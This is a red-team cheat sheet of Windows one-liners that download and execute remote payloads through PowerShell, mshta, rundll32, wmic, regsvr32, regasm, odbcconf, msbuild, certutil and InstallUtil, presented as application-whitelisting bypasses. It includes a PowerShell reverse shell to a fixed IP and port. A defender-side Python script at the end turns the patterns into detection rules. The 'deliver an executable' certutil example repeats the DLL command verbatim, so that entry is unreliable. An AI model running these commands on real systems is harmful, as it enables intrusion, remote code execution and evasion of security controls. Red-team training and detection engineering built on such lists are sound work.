Oneliners for Code Execution

Last updated 5 years ago

PowerShell

powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

You can also load the payload directly from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Cmd

Check out the great work by Arno0x on the Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior's work), which shows that you can easily execute any binary, DLL or script this way:

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

As seen in the Koadic framework, mshta also accepts a URL as its argument and executes the HTA file it points to:

mshta http://webserver/payload.hta

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Regasm/Regsvc

Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (it can be written in .NET/C#) that exposes the proper interfaces, and you can then load it over WebDAV:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Regsvr32

Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option, over HTTP:

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Second option, using a UNC/WebDAV path:

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Odbcconf

Note that the DLL file doesn't need to have the .dll extension. It can be loaded over UNC/WebDAV:

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Certutil

Great work by @subTee in discovering this:

certutil -urlcache -split -f http://webserver/payload payload

Now, combining several commands on one line, with InstallUtil.exe executing a specific DLL as the payload:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
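
As an added defender-side example (not part of this page or of arno0x's work), the following Python turns the command-line shapes above into simple detection rules and runs them over constructed process-creation events in Sysmon Event ID 1 shape; the field names, rule names and sample command lines are assumptions, and the benign certutil and powershell events are included to show the rules do not fire on ordinary use.

```python
import re

# One regex per one-liner family on this page, matched case-insensitively against
# the "CommandLine" field of a process-creation event (Sysmon ID 1 / Security 4688).
RULES = {
    "powershell download cradle": r"\bpowershell(\.exe)?\b.*(\biwr\b|invoke-webrequest|net\.webclient|downloadstring)",
    "cmd batch fed from UNC path": r"\bcmd(\.exe)?\b.*/k\s*<\s*\\\\",
    "cscript/wscript script from UNC path": r"\b[cw]script(\.exe)?\b.*\\\\",
    "mshta URL or inline script": r"\bmshta(\.exe)?\b.*(https?://|vbscript:|javascript:)",
    "rundll32 javascript: or UNC DLL": r"\brundll32(\.exe)?\b.*(javascript:|\\\\\S+\.dll)",
    "wmic remote XSL stylesheet": r"\bwmic(\.exe)?\b.*/format:\s*\"?https?://",
    "regasm/regsvcs DLL from UNC path": r"\b(regasm|regsvcs)(\.exe)?\b.*\\\\",
    "regsvr32 scriptlet via scrobj.dll": r"\bregsvr32(\.exe)?\b.*/i:\s*\S+.*scrobj\.dll",
    "odbcconf regsvr action": r"\bodbcconf(\.exe)?\b.*regsvr",
    "msbuild project from UNC path": r"\bmsbuild(\.exe)?\b.*\\\\",
    "certutil download or decode": r"\bcertutil(\.exe)?\b.*-(urlcache|decode)\b",
}
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES.items()]


def match_rules(command_line):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in COMPILED if rx.search(command_line)]


def scan_events(events):
    """Return [(image, [rule names])] for the events that triggered at least one rule."""
    hits = []
    for ev in events:
        names = match_rules(ev["CommandLine"])
        if names:
            hits.append((ev["Image"], names))
    return hits


# Constructed sample events (assumed shape, not real telemetry); the last two are benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta http://webserver/payload.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://webserver/payload payload"},
    {"Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil -verify cert.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for image, names in scan_events(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(names)}")
```

Matching on the command line rather than only on the image name means a renamed copy of the binary still has to carry the same tell-tale arguments to do its job.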

This information was referenced from:

PowerShellScripts/Invoke-EmbedInBatch.ps1 at master · Arno0x/PowerShellScripts (GitHub)
Windows oneliners to download remote payload and execute arbitrary code (arno0x0x)